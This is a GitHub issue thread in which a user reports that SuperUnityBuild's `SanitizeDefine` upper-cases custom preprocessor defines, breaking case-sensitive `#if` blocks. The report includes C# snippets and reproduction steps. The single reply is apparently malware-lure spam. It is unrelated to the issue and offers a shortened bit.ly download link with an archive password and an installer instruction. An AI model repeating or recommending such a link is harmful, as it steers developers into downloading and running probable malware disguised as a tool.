### ISSUE TITLE
Preprocessor directives forced to be upper case

### ISSUE THREAD

**Issue by ValentinChareyre** [superunitybuild/buildtool#152]
Hello! 👋

I am working on a project using third-party assets using `#define` [preprocessor directives](https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/preprocessor-directives).

Currently, `BuildProject.GenerateDefaultDefines` (see [here](https://github.com/superunitybuild/buildtool/blob/dev/Editor/Build/BuildProject.cs#L81)) collects the defines of the given release type and calls the string extension method `SanitizeDefine` (see [here](https://github.com/superunitybuild/buildtool/blob/dev/Editor/Generic/ExtensionMethods.cs#L21)) which transforms the define to uppercase. Because preprocessor directives are case-sensitive, the third-party code between the directives is stripped, which causes issues in the build.

```csharp
        // Editor/Build/BuildProject.cs
        public static string GenerateDefaultDefines(BuildReleaseType releaseType, BuildPlatform platform, BuildArchitecture arch,
            BuildScriptingBackend scriptingBackend, BuildDistribution dist)
        {
            // ...

            if (releaseType != null && !string.IsNullOrEmpty(releaseType.customDefines))
            {
                string[] customDefines = releaseType.customDefines.Split(';', ',');
                for (int i = 0; i < customDefines.Length; i++)
                {
                    defines.Add(customDefines[i].SanitizeDefine());
                }
            }

            return string.Join(";", defines.ToArray());
        }
```

```csharp
        // Editor/Generic/ExtensionMethods.cs
        public static string SanitizeDefine(this string input)
        {
            return input.ToUpperInvariant().Replace(" ", "").SanitizeCodeString();
        }
```

Is there any reason to force the defines to be uppercase?

Thanks in advance.

----

## Info
**Unity version**: Unity 2021.3.21f1
**Platform**: Windows
**Target build platform tested**: Windows

----

## Reproduction steps:
1. Create a new scene, leave the camera and light unchanged
2. Create a new script called `NewBehaviourScript` with the following content, and attach it to an empty object you place in front of the default camera

```csharp
using UnityEngine;

public class NewBehaviourScript : MonoBehaviour
{
    private GameObject _gameObject;

    void Start()
    {
        _gameObject = UnityEngine.GameObject.CreatePrimitive(PrimitiveType.Cube);
    }

    void Update()
    {
#if MyDefine
        _gameObject.transform.localScale = Vector3.one * Mathf.Sin(Time.time) * 5;
#else
        _gameObject.transform.position = new Vector3(Mathf.Cos(Time.time), Mathf.Sin(Time.time), 0) * 4;
#endif
    }
}
```

3. In SuperUnityBuild, define a new release type with the following define: `MyDefine`, add your empty scene to the scene list
4. Create a new build platform you can build to
5. Click on the build configuration you've created from the `Build Configurations` options at the bottom of the window, and click on `Selected Build Info`
6. Observe in the `Defines` section that your define has been transformed to upper-case
7. Build the game
8. Observe that the cube is moving in circles (code outside of the MyDefine) instead of growing and shrinking (code between MyDefine)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
